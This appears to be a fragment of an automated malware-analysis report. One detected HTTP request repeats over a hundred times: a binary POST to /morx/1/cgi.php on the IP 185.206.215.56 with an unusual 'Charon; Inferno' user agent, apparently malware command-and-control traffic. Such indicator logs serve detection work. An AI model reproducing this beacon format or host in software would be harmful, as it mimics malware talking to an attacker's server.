                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
